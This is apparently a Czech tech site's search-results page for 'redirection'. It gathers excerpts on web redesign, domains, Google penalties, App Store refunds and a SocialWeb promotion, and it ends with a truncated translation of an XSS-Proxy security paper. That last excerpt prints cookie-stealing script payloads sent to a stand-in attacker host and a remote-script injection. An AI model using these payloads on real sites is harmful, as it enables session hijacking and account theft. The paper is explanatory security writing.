Výsledky vyhledávání v sekci Webové stránky na dotaz přesměrování

Redesign webové stránky

access_time21.březen 2020personRedakce

Provozujete-li webovou stránku, která je psána fontem Times New Roman, používáte-li pop-up okna či je stránka optimalizována pro rozlišení 800x600 px, pak je ideální provést takzvaný redesign webové stránky.Redesignem se rozumí postupné provedení zásadních změn, které se u moderního webu dělat již nemusí. Zaměříme se v tomto článku na dobré tipy týkající se redesignu webu. Promyslete si změny plánujete-li redesign webové stránky, tak dostatečně přemýšlejte nad tím, co na radikální změny řeknou Vaši uživatelé. Myslíte si, že si zvyknout na nový vzhled stránky, či ztratíte stávající návštěvníky? Je jednoduchévše změnit a převrátit naruby, ale zjistěme nejprve, zda je radikální změna v naprostém pořádku. Změňte jen malou část webové stránky, abyste zjistili, jak na to budou uživatelé reagovat. Není špatné se samotnýchuživatelů zeptat, jaké změny by navrhovali. Pamatujte, že malé změny lehce vrátíte zpět. Pokud se však pustíte do rozsáhlých změn, pak návrat může být problémem. Největší problém je, že totální redesign přinutíuživatele „učit se“ na Vaší stránce znovu. Budou hledat, kde co máte, pokud změníte i strukturu webové stránky.Uživatelé nesmí být zmateníPokud na webové stránce vše přeházíte, pak budou uživatelé zmatení, což není pro Vás dobrá zpráva. Redesign by měl probíhat inkrementálně, po částech a při každé změně dejte uživatelům čas, než si na ni zvyknou. Snažte se změny dělat ve vizuálním směru, než ve funkcích. Také myslete na index vyhledávače. Po redesignu se může stát, že zamezíte vyhledávači přístup k požadovaným informacím. Zaměřte se na tuto část, protože mnoho lidí na přesměrování starých stránek zapomíná. Na žádné webové stránce by neměla chybět možnost vyhledávání. Uživatelé často potřebují najít danou informaci, ale nechtějí se jim procházet všechny články. Než by se k dané informaci proklikali, ztratili by zájem.Buďte individuálníMůžete zhlédnout, jaké změny provádí Vaše konkurence, ale buďte originální. Chcete být jiný web, něčím se odlišit. Importujte své nápady do tvorby webové stránky a viditelněte se svou originalitou na internetu. Nezapomeňte při redesignu ani na SEO optimalizaci v co nejširším rozsahu.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SEO a vyhledávače na dotaz přesměrování

Doména pro www stránku jak si správně vybrat

access_time21.březen 2020personRedakce

Podíváme se na to, jak správně si vybrat doménu pro Vaši webovou stránku. Nejdříve co znamená lidsky doména. Doména pro www stránku neboli jméno internetové stránky je označení pro snadné nalezení na internetu. Jestli znáte doménu nějaké webové prezentace, tak stačí jí zadat v prohlížeči a hned se Vám objeví požadovaná stránka. Každá webová stránka má vlastní unikátní doménu. V průběhu tvorby webových stránek by se mělo řádně promyslet jaký název by měla internetová stránka dostat, aby se předešlo zbytečným problémům.Doména musí být jednoducháVybrat doménu Vám pomůže společnost, která se zabývá prodejem domén. Na jejich stránkách máte políčko kam zadáte název a hned se Vám ukáže jestli je doména volná nebo už je obsazená. Před zakoupením jména pro Vaší budoucí internetovou stránku dbejte na to, aby byl název jednoduchý, jednoduše zapamatovatelný a aby nenastal problém ji sdělit klientovi přes telefon. Doména by neměla být zbytečně dlouhá, aby se nemusela zapisovat a byla lehce zapamatovatelná. Použití názvu firmy v doméně je nejlepší způsob jak podtrhnou svojí identitu.Myslete do budoucna při výběru doményV případě že jste menší firma, nezapomínejte na to, že jednou můžete být velká společnost a proto doporučujeme pořídit si nejenom doménu s koncovkou .cz ale i jinou jako je .com .net a další. Důvod je jednoduchý a to ten že v případě, že si budete chtít pořídit stejný název pro Vaší doménu bude obsazena a budete muset zaplatit hodně peněz za odkoupení od člověka, který ji sice nepotřebuje, ale s pomocí Vás si vydělá. V případě že pracujete mezinárodně taktéž doporučujeme si pořídit domény se stejným názvem, ale s koncovkou jiných státu jako například .de pro Německo, .ru pro Rusko a nebo .sk pro Slovensko.Klíčový slova v názvu doményV dnešní době hodně firem zabývající se optimalizací pro vyhledávače Vám doporučí dát si do domény vyhledávající výrazy. My však tuhle metodu nedoporučujeme, firmy které Vám to doporučí si usnadňují za pomocí tohoto tahu práci, ale nenechte se nachytat. Vezmeme to logicky, v doméně je možné použít jen jedno klíčové slovo, ale to předpokládáme, že Vám nestačí. Doména bude zbytečně dlouhá například „nejlevnejsi-ubytovani-v-chorvatku-split.cz“ a proto nebude snadno zapamatovatelná. Ztrácíte místo pro identifikaci Vaši firmy. A nakonec pro optimalizaci pro vyhledávače je to sice výhodnější a dostanete plus u vyhledávače, ale i když použijete klíčový slova v doméně, ve výsledcích nebudete jenom Vy, ale i konkurence přesto že by měla klíčová slova v doméně.Jak správně vymyslet název doményJak jsem již říkal, je lepší, aby byla doména kratší, ale stává se, že do názvu je třeba dát dvě a více slov, proto doporučujeme dávat mezi slova pomlčky usnadňuje to čtení Vaším klientům a snadněji si doménu zapamatují, například pneuservis-stepanek.cz než pneuservisstepanek.cz. Aby se nestalo, že člověk zadá název, bez pomlčky doporučujeme si pořídit doménu i bez ní a nastavit přesměrování.Firmy nabízející nákup doményVybírejte si společnosti, které už jsou dlouho na trhu, levné služby neznamenají vždy kvalitní služby a v tomto případě obzvlášť. Podívejte se na reference, které má daná společnost. Prozkoumejte a zeptejte se na administrační část k doméně, aby byla možnost snadně nastavit email k doméně a změnu DNS záznamu.Vybírejte doménu bez problémů se zákonemPřed vybráním zkontrolujte jestli vybraný název není patentovaní jako třeba Microsoft nebo Apple. Nebyl by to nejlepší výběr.Lhůta platnosti doményNepromeškejte dobu platnosti domény. Doména se většinou kupuje na jeden rok ale můžete samozřejmě koupit i na delší dobu. Musíte být řádně informováni předem od společnosti která má na starosti Vaší doménu o prodloužení, aby se nestalo to že Vám doménu koupí někdo jiný.Přejeme hodně úspěchu při koupi domény. V případě, že by jste potřebovali pomoci při koupi nebo zřízení domény, můžeme vše prokonzultovat.

folder_openPřiřazené štítky

Google ban a jak mu předejít

access_time22.březen 2020personRedakce

Asi každý SEO specialista již slyšel o Google ban neboli o Google filtrech, jimiž Google nechává projít internetové stránky. Cílem filtrů je zjistit, zda se jedná o podvod či manipulaci s výsledky, neboli zda porušily internetové stránky zákon.Všechny Google filtry nemají však oficiální potvrzení, a proto se vychází pouze ze zkušeností SEO specialistů. Doporučujeme však, abyste se nedostali do situace, kdy dostanete Google ban. Abyste totiž z této pokličky vyšli, bude to pro Vás těžká práce, která však může být neúspěšná.V případě, že dostanete Google ban, doporučujeme Vám držet se následujících postupů, které Vám pomohou z této nepříjemné situace.1. Aktivní přidání unikátního kontentu na Vaši webovou stránku.2. Časté obnovení webové stránky. Nejideálnější by bylo, kdyby byla Vaše stránka obnovována každý den, pokud jste dostali ban od Google. Je třeba ji tedy obnovovat i dvakrát denně.3. Získání nových odkazů z populárních internetových zdrojů, které mají dobré jméno u vyhledávače.4. V případě, že to vyhledávač umožňuje, doporučujeme napsat helpdesku přes panel webmaster.Nejznámější Google banSandboxTento filtr slouží hlavně pro nové webové stránky. Google chce předejít, aby při tvorbě webových stránek stačila pouze hlavní optimalizace, protože se pak stránky zobrazují při konkurenčních výsledcích. Sanbox může trvat od tří měsíců do několika let. Standardní období však je půl roku, ale to neznamená, že by Vaši stránku nikdo nenašel. Někdy ano, ale pod klíčovými slovy, která nejsou tak populární. Existuje domněnka, že období, během něhož je stránka v Sandboxu, není pro každý web individuální, ale je pro skupiny.Existují hlavní příznaky toho, že je Vaše stránka v Sandboxu:1. Stránka je v indexu Google a pravidelně navštěvována robotem.2. Vaše stránka se normálně objeví při vyhledávání specifických výrazů a frází či při hledání částech textu.3. Ve výsledcích se Vaše stránka zobrazuje se správnými nadpisy a popisky.4. Vaše internetová stránka není mezi prvními tisíci výsledky při zadání hlavního klíčového slova.Proto, aby Vás Google pustil ze Sanboxu, doporučujeme získávat nové odkazy z ověřených zdrojů. Odkazy musí být inteligentní, žádné z link farem.Filtr „doplňující výsledky“Při kontrole, kolik je indexovaných stránek ve vyhledávači, se můžete setkat na poslední stránce s možností zobrazení doplňujících výsledků. Tyto výsledky jsou pro vyhledávače bezvýznamné. Stává se to z toho důvodu, že tyto stránky neobsahují zajímavý obsah či jsou obdobné s jiným webem. Tento filtr či ban se dostává pro jednotlivé podstránky, nikoliv na celou webovou stránku. Abyste docílili jeho odstranění, pak stačí dát pár odkazů z vnitřních stránek.Ban BombingTento ban dostanete v případě, že je na Vaší stránce příliš odkazů se stejným textem neboli anchorem. V tomto případě doporučujeme při kupování nebo získávání odkazů z jiných zdrojů používat unikátní text odkazu, tedy synonyma.Filtr BowlingBan neboli filtr Bowling není ani sám o sobě ban. Je to název pro černou metodu SEO. Používá se konkurencí na Vaši webovou stránku. Konkurence tedy odkazuje na Vaši webovou stránku z link farem. Nedoporučujeme používat tuto metodu proti konkurenci. Pamatujte, že snadnější je dostat stránku do TOPu, než ji dát pryč.Filtr „Stáří domény“Podle názorů spousty optimalizátorů hraje velkou roli v optimalizaci pro vyhledávače zejména stáří domény. Čím je Vaše doména starší, tím méně na Vás bude tento filtr působit. Není to však vždy pravidlem. Webová stránka, která je vytvořena profesionálně, není už v Sandboxu, nemusí být ani stará, aby se mohla stát lepší než konkurence.Ban „Duplicita obsahu“Tento ban je nejsilnější, který můžete dostat. Google a jiné vyhledávače se snaží předejít, aby se kopíroval obsah z jiných stránek. Google ban proto dostanete buď Vy, nebo jiné zdroje, pokud kopírují obsah. Doporučujeme, abyste si nechali psát originální texty, zachovávejte si unikátní kontent a hlídejte si také, aby nikdo Váš obsah stránek nekopíroval. V případě, že zjistíte, že byl Váš kontent ukraden, obraťte se na Google či jiný vyhledávač.Google Ban -30Tento ban může internetová stránka dostat v případě, že využívají černé metody optimalizace. Nikdy nepoužívejte způsoby, jako jsou „doorway“, to znamená, že pro vyhledávače máte jednu stránku, která je optimalizována na určitá klíčová slova, kdežto pro uživatele máte druhou stránku. V praxi to znamená, že když Vaši stránku zaindexuje vyhledávač, a bude obsahovat všechny potřebné metody, budete umístěni na dobrých pozicích. S pomocí například JavaScriptu můžete uživatele přesměrovat na jinou stránku, kde bude jiná informace. V dnešní době s tím umí vyhledávače bojovat a snadno tento podvod odhalí. Z toho Google banu se těžko dostává, proto ještě jednou nedoporučujeme používat černé metody.Pokud dostanete tento ban, Vaše stránka se bude objevovat ve výsledcích až o třicet pozic níže. V případě, že dostanete tento ban, ihned odstraňte přesměrování.Ban „Ponížení ve výsledcích“Tento Google ban můžete dostat kvůli následujícím příčinám:1. Malé množství vnějších stránek na Vaši internetovou stránku;2. Opakující se Title a jiné meta-tagy;3. Duplicita obsahu z jiných zdrojů;4. Malé nebo žádné prolinkování vnitřních stránek.Dejte pozor na tyto faktory, které dost ovlivňují pozice ve vyhledávačích, a dbejte hlavně na meta-tagy.Tématický Google BanDnes Google velmi přísně sleduje odkazy, které vedou na Vaši internetovou stránku. V případě, že na Vás budou odkazovat porno stránky či stránky s dost jinou tématikou, dostanete Tématický ban, který Vaši stránku dost ovlivní při výsledcích. Také ji může zcela odstranit z vyhledávání. Dejte si velký pozor na stránky, ze kterých kupujete odkazy.Ban „Change Links“Jedná se o dost starou metodu, jak ovlivnit pozice ve vyhledávačích, ale v dnešní době je dost neefektivní. V žádném případě nepoužívejte metodu výměny odkazů a nemějte žádné stránky partnerů a další. V případě, že jste se rozhodli pro nelegální získání odkazu, kupujte jednosměrný odkaz, nebo používejte kruhovou výměnu odkazů.Ban „Hodně odkazů najednou“Tento Google ban můžete dostat v případě, že na Vaši internetovou stránku budete mít hodně odkazů. Pokud nechcete dostat tento ban, kupujte odkazy přirozeným způsobem.Ban „Přeoptimalizovaná stránka“Znamená to, že zneužijete legální optimalizaci, a budete používat černé metody. Vždy dbejte na hustotu klíčových slov v textu, nikdy nedávejte za každou cenu klíčové slovo do textu. Nepoužívejte často tag „strong“. Pamatujte si, že vše musí mít své meze, a to i optimalizace pro vyhledávače.Ban „Nefunkční odkazy“Dbejte na to, aby na Vaší internetové stránce nebyly odkazy na nefunkční stránky. Je to totiž známka toho, že stránka není monitorována a není profesionální. Občas musíte kontrolovat, jestli si odkazujete na zdroje, které jsou funkční. V případě, že máte hodně podstránek, využijte Web Master tools.Filtr „Dlouhé načítání stránky“Pokud se Vaše stránka dlouho načítá a obsahuje zbytečné efekty, které ovlivňují načítání stránky, nemusí se Vaše stránka zaindexovat. Dejte si pozor také na funkčnost Vašeho hostingu, abyste se mohli vždy na svou stránku dostat.Uvedli jsme Vám přehled hlavních Google ban. Tyto filtry byly ověřeny a potvrzeny SEO specialisty.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Operační systémy a Aplikace na dotaz přesměrování

Návod jak na vrácení peněz z App Store

access_time22.květen 2019personRedakce

Pokud se Vám stalo, že jste si na App Storu zakoupili něco omylem, nebo jste si koupili něco, co Vás zklamalo, možná nevíte, že máte možnost získat své peníze zpátky. Stačí se držet následujících kroků:1) Spusťte iTunes na svém počítači.2) Klikněte na své jméno a poté na Informace o účtu.3) Zadejte své heslo.4) Klikněte na Zobrazit vše ve složce Zakoupeno.5) Klikněte na šedou šipku, která je před tím, co chcete reklamovat.6) Klikněte na Nahlásit problém vedle toho, co chcete vyreklamovat.7) Budete přesměrováni na stránku Apple, kde se stačí držet popsaných kroků a poté kliknout na možnost vrácení peněz. Musíte také napsat proč.Nutno dodat, že Apple obvykle nevrací peníze za věci, které jste zakoupili před více než třemi měsíci. A také je potřeba vědět, že příliš častým žádáním vrácení peněz, Vám Apple tuto možnost z iTunes prostě odejme.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SocialWeb na dotaz přesměrování

Co je SocialWeb? ..vytváření privátních webových sítí.

access_time20.květen 2019personRedakce

SocialWeb není úplně vhodný pro jednotlivce, jejichž zájem je vytvořit si portfólio a nebo jednoduchou webovou prezentaci a to hned z několika důvodů:1. Firemní a nebo osobní webová prezentace se dá lépe postavit například přes WordPress a nebo X online nástrojům (Webnode,Wix….)2. Takový jednotlivci systém SocialWeb zkrátka nevyužijí a pro jiné uživatele systému SocialWeb jejich aktivity jak si povíme níže mají nulovou hodnotu.Takže, SocialWeb zkrátka není určen pro obyčejné uživatele, kteří si chtějí pouze sestavit svou webovou prezentaci a nebo jednoduchý blog.Teď asi nastává otázka pro koho je tedy SocialWeb určen?Víte pro koho je SocialWeb určen?- Marketingové agentury, PR agentury, dokonce i webdesign firmy pro budování microsites.- Pro majitele internetových obchodů pro budování podpůrných tématických webů.- Pro jednotlivce s ambicí stavět a spravovat několik, třeba i desítky webových stránek. Některé ze základních funkcí systému SocialWeb pro tvorbu a správu webových stránek:Vytváření a správa libovolného počtu webových stránek v jednom uživatelském účtu.Správa webhostingů, instalace SSL certifikátů, správa serverů a IP adres zcela automaticky a zdarma.Registrace domén přímo a automaticky z okamžitým nastavením DNS přímo na vám přiřazený server a IP adresu, kdy do několika minut automaticky můžete na zaregistrované doméně stavět web bez žádné akce z vaší strany.Wedos Wapi podpora, kdy můžete SocialWeb využívat jen jako registrační nástroj - tedy, že SocialWeb domény budete registrovat přes váš Wedos účet na vaše fakturační údaje a vše bude fungovat automaticky.Zobrazení a vyhledávání volných domén, SocialWeb monitoruje veškeré expirované domény a následně u nich zjišťuje zda jsou volné, pokud ano, můžete si kteroukoliv volnou expirovanou doménu ihned zaregistrovat, stejně tak můžete ve fulltextu vyhledávat domény, které obsahují konkrétní klíčové slovo. (Nyní je v databázi asi 80 000 CZ volných domén.).Monitoring expirujících domén a roboti pro předregistraci domén, kteří se budou snažit zaregistrovat doménu dříve než spekulanti a nebo jiní roboti za cenu registrace domény (jako alternativa k Daukce.cz, kde pokud doménu chcete, tak jim vlastně o ní řeknete a pak máte možnost si ji vydražit… což mě osobně přišlo vždy jako celkem sprosté.Několik šablon webů, které pak můžete libovolně sestavovat.Tvorba mobilních aplikací.Správa sociálních sítí a účtů, publikace na sociální sítě, plánování publikace…Blog, kategorie, sekce, příspěvky..25 modulů, které lze pro kteroukoliv šablonu použít.Sharelock (zamknutí obsahu, vyžadované sdílení před odemknutím), Agelock (zamknutí obsahu pro návštěvníky mladší X let.Push notifikace, shromažďování uživatelů pro každý z vašich webů, následně rozposílání upozornění v případě vložení nového článku.Pro publikaci automatické generování klíčových slov z obsahu článku (pokud nejsou vyplněny manuálně)Slideshow publikace, Video publikace, YouTube publikace, Publikace na X sociálních sítí, plánování publikace….SEO monitoring a počítání nefunkčních odkazů, kdy systém sleduje všechny URL adresy, které skončili na stránce 404 a management těchto odkazů (přesměrování, BAN…)Automatické opravy nefunkčních odkazů s tím, že se systém snaží najít vhodný článek na základě tagů článků.Kompletní jazykové mutace, weby je možné stavět pro jakoukoliv zem.Tvorba mobilních aplikací…..Slideshow editor (tvorba slideshow pro konkrétní weby)Video editor (stříhání, nahrávání videa i z URL adres) kompilace videa….CSS editor – web staváte na základě nějaké šablony, kdy pak ještě máte možnost šablonu webu překódovat CSS editorem.0% branding, nikde na žádném vašem webu není ani zmínka (ani v řádné URL adrese) o SocialWebu.100% minifikace zdrojového kódu.Možnost stažení zdrojového kódu pro webhosting vašich webů na vašich (Apache,Nginx) serverech.Tvorba a správa emailvých adres pro jakékoliv vaše domény.Vizualizace návštěvnosti a sledování návštěvnostiNewsletter řešení.A další funkce a řešení… Dobře, takže asi chápete, že SocialWeb obsahuje celou řadu nástrojů a funkcí, které komukoliv umožní vytvářet weby, pak je spravovat a také do nich publikovat plus celou řadu nástrojů, které žádná jiná služba nenabízí.Řekněme, že máte firmu a chcete díky SocialWebu vytvořit několik webů, SocialWeb umožňuje kromě výše zmíněných věcí také sestavit si tým, v tomhle ukázkovém případě budou mým týmem tři lidé.Jeden z těchto lidí v týmu se jmenuje Tom a ten také jako jediný umí pracovat se systémem SocialWeb, takže vlastně jeho úkolem a cílem bude celou vaši privátní síť sestavit.- Zaregistruje domény- Vytvoří wwbhostingy- Vytvoří SSL certifikáty- Nastaví PUSH notifikace- Vytvoří weby- Vytvoří a vloží logo pro každý z nich- Vytvoří kategorie a sekce- Sestaví moduly pro každý web- Vytvoří Sociální stránky a účtyTakže Tom vlastně všechno nachystá, pokud vytvoří pouze dvě webové stránky s jednou, která bude přesměrovaná na sekci jiného webu, struktura toho co Tom může nachystat může vypadat třeba takhle:Takže možná již začínáte chápat, že SocialWeb nejsou pouze nástroje pro tvorbu a správu webových stránek, SocialWeb je hlavně koncept vytváření webových sítí.SocialWeb nekonkuruje těm co weby vytváří, online nástrojům pro tvorbu webů, kde máte možnost si vytvořit web a administraci, SocialWeb jsou struktury a vztahy mezi jednotlivými službami a to tak aby všechno bylo maximálně automatizované a jednoduché – tedy aby Tom nepotřeboval znalost programování, zkrátka aby to zvládl téměř každý, tohle je skutečně velmi jednoduchá síť, kterou lze systémem SocialWeb vytvořit, skutečné sítě pak jsou mnohem složitější, sestavené z desítek webů a stovek sociálních účtů a stránek. Teď v týmu máme Janu, ta vůbec neví co je SocialWeb, ani nechápe jak SocialWeb funguje a vlastně to ani nepotřebuje vědět, jejím jediným úkolem je přečíst si zadání a napsat článek, přiložit obrázek (video), zvolit z nabídky sociální sítě a stránky na kterých si přeje tento článek publikovat a vlastně jen kliknout na tlačítko publikovat, to co Jana takto udělá pak vypadá asi tak:Jana dostala úkol publikovat článek na web magazin21.cz na téma Krabičková dieta.Jana článek sepsala a u článku zvolila, že chce tento článek publikovat také na dvou Facebook stránkách, jedné Twitter stránce a do nějaké Pinterest nástěnce.Také u článku zatrhla rozeslat PUSH notifikaci a také rozeslat Email newsletter.Takže zatrhla a sepsala, nic víc dělat nemusela, výsledek?1. Článek byl publikován na web Magazin21.cz do kategorie Hubnutí a styl2. Bylo rozesláno upozornění (PUSH notifikace) všem odběratelům tohoto webu (1013 lidí)3. Byli upozorněni lidé, kteří mají nainstalovanou ios aplikaci webu Magazin21 (800 lidí)4. Byli upozorněni lidé, kteří mají nainstalovanou android aplikaci webu Magazin21 (3200 lidí)5. Bylo odesláno 540 emailů 540 odběratelům newsletteru o novém článku6. Článek byl publikován do Facebook stránky Jíme zdravě (1000 členů)7. Článek byl publikován do Facebook stránky Magazin21 (250 lajků)8. Článek byl publikován do Twitter stránky Magazin21 (250 odběratelů)9. Článek byl publikován na Pinterest, Instagram, LinkedIn… (X dalších sledujících/odběratelů) Takže jedním publikovaným článkem na jeden web Jana hned oslovila nejméně strovky lidí..Články, která vykazují vysokou počáteční návštěvnost, mají i mnohem vyšší průběžnou čtenost a jsou také rychleji zaindexovány ve vyhledávačích. Takže tohle je SocialWeb?Do teď jsem hovořil o vytváření privátních sítí, jenže tito majitelé firem se svými sítěmi jsou vlastně součástí další sítě, která přináší spoustu výhod, jen bych ještě rád upozornil na to, že využívání těchto komponentů SocialWebu je zdela dobrovolné.Podívejme se na 4 koncepty různých uživatelů SocialWebu:1. To je síť kterou jsem popsal výše, tři členové týmu, dva weby.2. Tohle je síť uživatele, jenž nemá členy týmu ale má 8 webových stránek.3. Uživatel, který nemá ani webové stránky ani členy týmu.4. Uživatel, jenž nemá žádné webové stránky ale má členy týmu. Výhoda – Tvorba obsahu a copywritingUživatel číslo jedna, je vlastně soběstačný, má svůj tým a své weby a vlastně vůbec tuto výhodu nepotřebuje.Uživatel dva má velké množství webů, do kterých by měl neustále dodávat nějaký obsah, jenže pochopitelně na to nemá čas ani kapacitu a přesně z toho důvodu může v SocialWebu existovat uživatel 3 a 4, kteří se vlastně živý copywritingem a dodávají obsah na webové stránky jiných uživatelů.Takže takhle se v SocialWebu může v cloudu tvořit obsah webových stránek.O tom jak funkce pro výkup článků v systému socialweb funguje jsem napsal zde článek.Obsah je velmi důležitý, stejně tak jako to, že každý z webů má návštěvnost, jen tak je pak možné tyto weby efektivně využívat pro SEO, linkbuilding, marketing a PR publikaci.Takže teď již máme webové stránky, strukturu, tým, obsah, návštěvnost a na závěr chci ukázat jak SocialWeb dokáže pomáhat například reklamce a nebo PR agentuře.Výhoda - využívání webů jiných uživatelů pro vaše potřebyTakže vaše privátní síť obsahuje dva weby, ty můžete využívat pro co chcete a jak chcete.Co když budou vaši klienti chtít publikaci PR článků na více jak vašich dvou webech?Co když je váš klient někdo, kdo chcete udělat PR na niche, který se k žádnému z vašich webů nehodí?Tohle se právě v SocialWebu dá skvěle řešit, tímto způsobem můžete propagovat služby, produkty zkrátka vytvářet publikace na jiných webech uživatelů SocialWebu, kteří to v nastavení každého jejich webu a nebo v nastavení kategorie povolí.Pro tyto případy existují tři scénáře.1. Agentura, která má své weby a chce publikovat také na jiných webech (dle obrázku)V této variantě máte zase několik možností, jedna z nich je, pokud chcete publikovat na jiných webech jiných uživatelů umožnit také publikaci jiným subjektům na vaše weby – tak můžete pokrývat náklady za publikaci na jiné weby tzv PR exchange.Nebo můžete mít tolik webů, že nebudete potřebovat další, takže si můžete umožněním publikace jiným přivydělávat a nebo můžete využívat jiné weby a platit za to..2. Agentura, která chce využívat webové stránky pro PR a linkbuilding avšak nemá své weby- V tomto případě existuje služba Prstudio.cz, ve které si můžete zakoupit kredit a vyhledávat weby pro publikaci a nebo prohledávat články pro nahrazení klíčových slov SEO odkazem – SocialWeb tak vlastně vůbec nepotřebujete.3. Agentura / Jednotlivec, který nemá o publikaci zájemNemusíte nic nikam publikovat, můžete jen vytvářet weby a tak na vašich webech vydělávat.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Hacking na dotaz přesměrování

Pokročilé techniky xss (cross-site scripting)

access_time16.červen 2020personRedakce

Popis pokročilého Cross-Site-Scriptingu, se vzdálenou kontrolou v reálném čase, od autora aplikace XSS-proxy jménem Anton Rager. Cross Site Scripting (XSS) je mnoha vývojáři a security profesionály obvykle považován za málo závažnou bezpečnostní zranitelnost. Do dnešní doby vznikla řada projektů s poukazem na potencionální rizika XSS, ale problém je převažne na pokraji zájmu bezpečnostních expertů a to včetně širších souvislostí o které tady jde.Autor aplikace XSS proxy napsal a zveřejnil popis v naději, že se odlehčený pohled na věc změní. Cituji: Doufám, že tímto dokumentem a vydáním nástroje pod jménem XSS-proxy (popsáno níže) změním pohled na celou situaci. XSS-Proxy umožňuje plnou kontrolu XSS útoků vzdáleným uživatelem (útočníkem). Tento dokument popisuje obvyklé XSS útoky a představuje nové metody/nástroje pro vytváření interaktivních XSS útoků, obojsměrných útoků a ještě více zla.Nejedná se o detailní návod (XSS howto), ale o širší vysvětlení metod XSS útoků. CGISecurity XSS FAQ (1) je dobrý zdroj pro celkový pohled na problematiku hlavních XSS zranitelností. V závěru textu jsou reference (2,3,4,5) obsahujíci skvělý materiál pro navazujíci XSS témata.Projekt XSS-proxy nevznikl jako platforma pro diskuzi a řešení. Existuje celá řada zdrojů, metod a možností pro hlášení chyb nebo opravování XSS děr. Pokročilé metody XSS které budou v textu představeny obcházejí mnoho metod aplikovaných proti XSS zranitelnostem. Doporučené čtení o hidden form inputs, URL re-writing, POST methods častokrát podsouvají řešení které nejsou 100% učinné, obzvlásť v případě, že má útočník přístup ke stejnému obsahu (a jscript/values) jako jeho oběť. Zbavit se všech speciálních HTML znaků nebo precizní filtrování vstupu je k ničemu v případě, že existuje neobjevený způsob jak vstup obelstít. Řešením může být rozdelení webových stránek na četné dokumentové domény, kde bude pro útočníka mnohem obtížnější provést/najít XSS útok/zranitelnost v porovnání s jediným místem kde je vše pohromadě. CGI vyhledávání na stránce v jedné subdoméně a citlivé oblasti na další(ch) může být užitečné.Pozadí XSSJako mnoho z vás ví, běžné XSS útoky vycházejí typicky ze dvou základních principů:1 – Útočník uploaduje <script> tag do veřejného fóra, blogu nebo stránek které navštevují uživatelé a obsahují XSS zranitelnost. Útočník pak díky přístupu získa (harvesting cookies) cookies webové stránky ze kterých vyčte řadu důležitých informací a díky tomu častokrát i přítpup k uživatelským účtum. Útoky jsou ale někdy využitelné mnohem hlouběji. Zde je to co myslím a říkam mnoha lidem co XSS přesně znamená. Příklad:Někdo chce odeslat následujíci kód na utocnik.com aby to další uživatelé sprocesovali.<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>Je to pokus o získání obrázku ze serveru útočníka pomocí cookies uživatele blogu priklad.com v URL.2 – Útočník použije veřejný web náchylný na útok XSS jak bylo uvedeno nahoře, nebo email zprávu založenu na XSS pro přesměrování uživatele na druhý server zranitelný pomocí XSS. Druhý server je aktuální cíl útočníka a stránka samozřejme obsahuje vlastní XSS zranitelnost, kde nic netušíci uživatel injektuje obsah <script> do dokumentu, který navenek pouze vidí. To v kombinaci s přesměrováním z dalšího webu umožňuje podvržení cookies, podvržení form/submit obsahu nebo specifickou akci XSSnutého uživatele proti dalšímu webu. Tato metoda je hodně rozšířena ale pramálo admiínistrátorů chápe, že se jedná o způsob útoku. Jak to funguje?Někdo chce odeslat následujíci kód na priklad.com aby to další uživatelé sprocesovali. <script>document.location=’http://ebanking.com/search?name=<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>'</script>Moment kdy je uživatel přesměrován na ebanking.com s hořejší XSS, toto je to co se vrátí uživateli a bude spuštěno:<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>To je pokus o získání obrázku ze serveru útočníka s cookies uživatele ebanking.com v URL.V minulosti hodně lidí zdůrazňovalo, že pokročilou manipulaci s webovým obsahem lze dosáhnout s XSS skriptem otevirajícím IFRAME (nebo další windows-like element) a loads/submits pro další dokumenty na stejné stránce. Důvěra v DOM umožňuje přítomnost Javascriptu v dokumentech a dovoluje interakci s dalšími windows/IFRAME, do doby než budou okna směrována do stejné dokumentové domény (protokol + domain_name + port).Aktuální metody XSS útoků jsou typicky limitovány pro jednu transakci a ve výsledku pouze v rámci cílové stránky, cookie harvesting nebo podvržení formuláře (form submission leakage). Zásady XSS-Proxy / ÚtokuXSS-Proxy rozšířuje běžné XSS útoky a kombinuje je s možností vykonání dalších Javascript příkazů, z libovolného vzdáleného serveru (viz Javascript Remoting reference číslo (6) pro detaily s IFRAME) pro možnost XSS být více než-li přesměrování s únikem cookies. Tato kombinace útočnikovi umožňuje ustavit stabilní, obousměrný kontrolní/přenosový kanál na oběť XSS a tím přistupovat na XSSnuté webové stránky s identitou oběti. Po celou dobu co má oběť útočníka otevřené XSS okno má útočník totální kontrolu nad prohlížečem oběti oproti XSS stránce s možností přesměrování na další stránky zranitelné XSS, nebo předání specifického blind requestu dalším serverům (viz reference číslo (3) provádění Cross-Site-Request-Forgeries aka CSRF a reference číslo (4) pro Session-Riding).Zmíněné situace lze dosáhnou s jedním nebo druhým útokem popsaným nahoře, teď se pokusíme názorně popsat příklad dvojího XSS přesměrování serveru. Oběť dostane XSS vektor pomocí blogu, diskuzního boardu, emailem atp. (předpokládaejme, že oběť surfuje na webech kde je možné vytvořit XSS – zavoláme stránku spatnyblog.com) a Javascript obsah přesměruje uživatele na druhou stránku (zavoláme druhou stránku ebanking.com a předpokládame samozřejmě, že stránka obsahuje XSS vo vyhledávací funkci, takže můžeme opakovat pomocí GET). Přesměrovací URL referuje na refers to a napadnutelnou část (cgi/etc) na druhém serveru což způsobý odezvu serveru která bude obsahovat Javascript příkaz útočníka který oběť vykoná.Inicializační XSS vektor na spatnyblog.com bude vypadat nějak takhle:<script>document.location=“http://ebanking.com/search?name=<script src=’http://utocnik.com/xss.js‘></script>“</script>Okno oběti teď má dokumentovou doménu ebanking.com a Javascript příkazy běží na doméně. Díky Javascript oběť posílá requesty na http://utocnik.com pro další skriptové příkazy. Nástroj XSS-Proxy aktuálně běží na utocnik.com a posyktuje další Javascripty pro inicializaci klientské části obsahujíci třeba funkce pro čtení dokumentů, procesování, přesměrování odpovědí, manipulaci chyb (error handling), stejně jako další příkazy pro vytvoření IFRAME, načtení root dokumentu (/) na cílovém serveru (ebanking.com) do IFRAME, načtení trvá pár vteřin, čtení obsahu (za použití innerHTML), pak následují další požadavek skriptů na http://utocnik.com. To vypadá komplexně ale jedná se pouze o několik řešení a reference časovač pro více volání skriptu na XSS-Proxy server. Funkce zůstanou v paměti až do doby než se okno oběti změní. Co se stane když od oběťi odejdou na 